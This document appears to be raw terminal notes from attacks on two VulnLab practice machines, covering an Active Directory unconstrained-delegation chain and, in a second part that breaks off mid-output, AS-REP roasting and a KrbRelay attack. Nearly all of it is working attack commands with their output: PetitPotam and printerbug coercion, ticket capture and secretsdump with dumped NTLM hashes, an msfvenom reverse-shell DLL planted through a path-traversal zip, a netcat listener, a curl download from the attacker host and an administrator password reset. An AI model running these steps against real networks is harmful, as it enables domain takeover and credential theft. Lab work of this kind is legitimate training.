1g 0:00:00:03 DONE (2024-06-10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u 'N.Thompson' -p 'KALEB_2341' -M maq  
SMB         dc1.delegate.vl 445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP        dc1.delegate.vl 389    DC1              [+] delegate.vl\N.Thompson:KALEB_2341 
MAQ         dc1.delegate.vl 389    DC1              [*] Getting the MachineAccountQuota
MAQ         dc1.delegate.vl 389    DC1              MachineAccountQuota: 10

.

a new tool ( dnstool , printerbug )

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ git clone https://github.com/dirkjanm/krbrelayx.git

Cloning into 'krbrelayx'...
remote: Enumerating objects: 202, done.
remote: Counting objects: 100% (51/51), done.
remote: Compressing objects: 100% (24/24), done.
remote: Total 202 (delta 33), reused 30 (delta 27), pack-reused 151
Receiving objects: 100% (202/202), 102.06 KiB | 1.73 MiB/s, done.
Resolving deltas: 100% (109/109), done.
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                                                    
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate          
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  dnstool.py  krbrelayx.py  lib  LICENSE  printerbug.py  README.md  venv
                                                                                                                   
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m pip3 install impacket
/home/puck/vulnhub/delegate/krbrelayx/venv/bin/python3: No module named pip3
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ pip3 install impacket          
Collecting impacket
  Using cached impacket-0.11.0-py3-none-any.whl
--snip--
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pycryptodomex, pycparser, pyasn1, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, ldap3, Jinja2, cffi, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodomex-3.20.0 six-1.16.0
                                                                                                                     


.

new tools ( bloodyad.py , addspn.py & PetitPotam.py)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 -m venv venv                                            
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ source venv/bin/activate 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.2.138 --action add DC1.delegate.vl -dns-ip 10.10.81.86      
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD              
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ cd ..      
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl --additional 

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.81.86 DC1.delegate.vl             
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  bloodyAD  dnstool.py  krbrelayx.py  lib  LICENSE  PetitPotam  printerbug.py  README.md  venv
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd PetitPotam 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.81.86

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.81.86[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/PetitPotam]
└─$ 

Below the bloodyAD installed in Python Virtual Enviroment (  i had troubles with dependicies)

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ git clone https://github.com/CravateRouge/bloodyAD.git
Cloning into 'bloodyAD'...
remote: Enumerating objects: 1123, done.
remote: Counting objects: 100% (495/495), done.
remote: Compressing objects: 100% (274/274), done.
remote: Total 1123 (delta 263), reused 350 (delta 209), pack-reused 628
Receiving objects: 100% (1123/1123), 584.62 KiB | 5.41 MiB/s, done.
Resolving deltas: 100% (681/681), done.
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ cd bloodyAD 
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION 
Traceback (most recent call last):
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD.py", line 2, in <module>
    from bloodyAD import main
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/__init__.py", line 1, in <module>
    from .network.config import Config, ConnectionHandler
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/config.py", line 2, in <module>
    from bloodyAD.network.ldap import Ldap
  File "/home/puck/vulnhub/delegate/krbrelayx/bloodyAD/bloodyAD/network/ldap.py", line 5, in <module>
    from msldap.client import MSLDAPClient
ModuleNotFoundError: No module named 'msldap'
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ ls
bloodyAD  bloodyAD.py  LICENSE  pyproject.toml  README.md  requirements.txt  tests
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ pip3 install -r requirements.txt
Processing /home/puck/vulnhub/delegate/krbrelayx/bloodyAD
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting asn1crypto>=1.3.0 (from bloodyAD==2.0.3->-r requirements.txt (line 1))
--snip--
Successfully built bloodyAD
Installing collected packages: wcwidth, asn1crypto, unicrypto, tqdm, tabulate, prompt-toolkit, oscrypto, h11, winacl, asysocks, minikerberos, asyauth, msldap, bloodyAD
Successfully installed asn1crypto-1.5.1 asyauth-0.0.20 asysocks-0.2.12 bloodyAD-2.0.3 h11-0.14.0 minikerberos-0.4.4 msldap-0.5.10 oscrypto-1.3.0 prompt-toolkit-3.0.47 tabulate-0.9.0 tqdm-4.66.4 unicrypto-0.0.10 wcwidth-0.2.13 winacl-0.1.9
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ python3 bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to UwU$'s userAccountControl
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx/bloodyAD]
└─$ 

.

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cd krbrelayx 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC 
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.81.86
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

Using powermad & printerbug

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
                                        
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
                                        
Data: 180768 bytes of 180768 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
HTTP/PWNED.delegate.vl
RestrictedKrbHost/PWNED
HOST/PWNED
RestrictedKrbHost/PWNED.delegate.vl
HOST/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> 

setup the listener ( waiting for connection then)

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

start printerbug

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
 addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'   krbrelayx.py   LICENSE      printerbug.py   venv
 bloodyAD    dnstool.py                                    lib            PetitPotam   README.md
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked
                                                                                                                     
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

use impacket-secrectsdump to get the hashes.

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist                                                               
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
    renew until 06/19/2024 07:07:36
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up... 
                                                                                                                     
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]

.

What a ride.

 

vulnlab-bruno

vulnlab bruno

a hard machine

Tools used : impacket-GetNPUsers , crackmapexec , bloodhound-python , msfvenom ,  impacket-smbclient , KrbRelay.exe ,KrbRelayUp.exe , Rubeus.exe , impacket-ticketConverter , impacket-secretsdump , evil-winrm

──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-GetNPUsers bruno.vl/svc_scan -dc-ip 10.10.124.39               
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Cannot authenticate svc_scan, getting its TGT
$krb5asrep$23$svc_scan@BRUNO.VL:09ca9d7e711a56a1f32bb669a42453f7$4010b699655764a235ad95abe2edf6fd2b368f73aebb7f9fac8fd62152c57ce7d08cb2a8e028ef84323485cda101d51cb4151fc1fdb0a9773bc103647303d0401aabf77c6b4e141786fa7e8e675987b8ece6a6cb947dc7a64825da5d64aa1d4f24a0638ec7b9cc96d64a241e719126cebb8488e92c6c0a9edcdbaff4d0ba71be1c37b76d1dcc3c85f500ae573ee25e5db14fef6eab9e3c55e245c318fc5308ebd54eaa6ebaede68b11601da50cb738df8a53736ab8f5be08b099d797f95067f0741d305500a7f5762e0a088fa9b29d02092a86eef3b53aa575e916007eb089b8da462e9a
                                  
┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ john svc_scan.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Sunshine1        ($krb5asrep$23$svc_scan@BRUNO.VL)     
1g 0:00:00:00 DONE 2/3 (2024-06-09 11:01) 16.66g/s 850166p/s 850166c/s 850166C/s Piano..Open
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 


 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ crackmapexec smb bruno.vl -u 'svc_scan' -p 'Sunshine1' --shares
SMB         brunodc.bruno.vl 445    BRUNODC          [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB         brunodc.bruno.vl 445    BRUNODC          [+] bruno.vl\svc_scan:Sunshine1 
SMB         brunodc.bruno.vl 445    BRUNODC          [+] Enumerated shares
SMB         brunodc.bruno.vl 445    BRUNODC          Share           Permissions     Remark
SMB         brunodc.bruno.vl 445    BRUNODC          -----           -----------     ------
SMB         brunodc.bruno.vl 445    BRUNODC          ADMIN$                          Remote Admin
SMB         brunodc.bruno.vl 445    BRUNODC          C$                              Default share
SMB         brunodc.bruno.vl 445    BRUNODC          CertEnroll      READ            Active Directory Certificate Services share
SMB         brunodc.bruno.vl 445    BRUNODC          IPC$            READ            Remote IPC
SMB         brunodc.bruno.vl 445    BRUNODC          NETLOGON        READ            Logon server share 
SMB         brunodc.bruno.vl 445    BRUNODC          queue           READ,WRITE      
SMB         brunodc.bruno.vl 445    BRUNODC          SYSVOL          READ            Logon server share 
                                                   

some Bloodhound Analysis

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ bloodhound-python -d bruno.vl -c all -u 'svc_scan' -p 'Sunshine1' -ns 10.10.84.244      
INFO: Found AD domain: bruno.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: brunodc.bruno.vl
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: brunodc.bruno.vl
INFO: Done in 00M 05S

creating Venom & use KrbRelay

for the payload I used a msfvenom reverse shell and saved it as Microsoft.DiaSymReader.Native.amd64.dll , and created the zip file with a path traversal using 7zip ( renaming the zipped file to ../app/Microsoft.DiaSymReader.Native.amd64.dll

 

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f dll > Microsoft.DiaSymReader.Native.amd64.dll     
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes

.

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ impacket-smbclient bruno/svc_net:Sunshine1@bruno.vl                                     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
queue
SYSVOL
# use queue
# rm evil3.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:15:54 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
# put Microsoft.DiaSymReader.Native.amd64.zip
# ls
drw-rw-rw-          0  Mon Jun 10 04:16:22 2024 .
drw-rw-rw-          0  Mon Jun 10 03:39:44 2024 ..
-rw-rw-rw-       1994  Mon Jun 10 04:16:22 2024 Microsoft.DiaSymReader.Native.amd64.zip
# 

 

Getting Root with Resource Based Constrained Delegation (RBCD )

i used : https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_Any/KrbRelay.exe

┌──(puck㉿kali)-[~/vulnhub/bruno]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.84.244] 65278
Microsoft Windows [Version 10.0.20348.768]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name      SID                                           
============== ==============================================
bruno\svc_scan S-1-5-21-1536375944-4286418366-3447278137-1104


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes                                        
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                          Well-known group S-1-5-3      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                               Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                       Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448                                                    


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\Users\svc_scan\Desktop>curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
curl http://10.8.2.138:8000/KrbRelay.exe -o KrbRelay.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1581k  100 1581k    0     0  3664k      0 --:--:-- --:--:-- --:--:-- 3685k

c:\Users\svc_scan\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 123D-CFA3

 Directory of c:\Users\svc_scan\Desktop

06/10/2024  08:32 AM    <DIR>          .
06/29/2022  04:09 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
06/10/2024  08:32 AM         1,618,944 KrbRelay.exe
               3 File(s)      1,620,025 bytes
               2 Dir(s)  15,324,868,608 bytes free

c:\Users\svc_scan\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Users\svc_scan\Desktop> ./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
./KrbRelay.exe -spn ldap/brunodc.bruno.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3 -rbcd S-1-5-21-1536375944-4286418366-3447278137-1116 -ssl -port 10246 -reset-password administrator Puckie71#
[*] Relaying context: bruno.vl\BRUNODC$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\svc_scan\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAABr15/LWcZ9/+EJA1xQswkDAsgAAAgP//9OCOsICNkdgCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:

[*] Forcing SYSTEM authentication
[*] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 608206d506092a864886f71201020201006e8206c4308206c0a003020105a10302010ea20703050020000000a382050761820503308204ffa003020105a10a1b084252554e4f2e564ca2233021a003020102a11a30181b046c6461701b106272756e6f64632e6272756e6f2e766ca38204c5308204c1a003020112a103020105a28204b3048204af8cc26b37e0e38b4a1db375eb1dfc5df9979a82ce341d9f39834a7aa00b4baf1f8f3f662b537819fa28f4df47b783f61ae4f260c5130fadf4854efe24470e5f46ee9d78e9970bf353d8f79231b1ed3bef772cda2f804862909d51029a779978f4aa6348b1fada3c56bfa6c6f05158e221df100fbe0fa7e978d40e67237b2d19e7d2f1bb1f50e05eaa1c88ecc20ed0383f84767b9b4f4ef74038d930ac02d185a891c8e1bfc8653526cb1252d7b6b781880c3534b0f08680763e17848264e6f6fc8e1585d75d6e9d748ab9c6c79c7ced7855305ae09f722d8988a30d443fb04f354eb6b315c0eb1e1652c0be9d028b3205b855a405950507f2aecf13bf58d847f6c214015bd7aed4f185dbb6939ca39a7350f3e92bc453b39a9638518db4cc7975d3ef1f16fa444ab852bbe595ee869fc865d576a56a3222419938701402d7ebbf6145de290b620b020a42ee9ff9288583152135907f31a156ea547d86a9b1f270c9b729bf506ef5f138ae90e9930ca7b8a9ac8033ad941497fe09235621ea7fa6e2cf98e1fffe52b12073270b1dc441873e662154b22844f517fa1803ad0ca466945c0b2d3e0ecf627068126cc58b378a52f235eddbdbedad268d31d28f8156eb7451bb1ca1fb812d110058468def69b955f38867d1a8e2968c45254f9d11030365840b140508378ed0116ed05753bf6b21ab12596059418ef63716412b0e997e4ca92e49ae14cb754f7d4363279907d6aa8df88fe85d03886be0b7eae8aaeaf8c2e8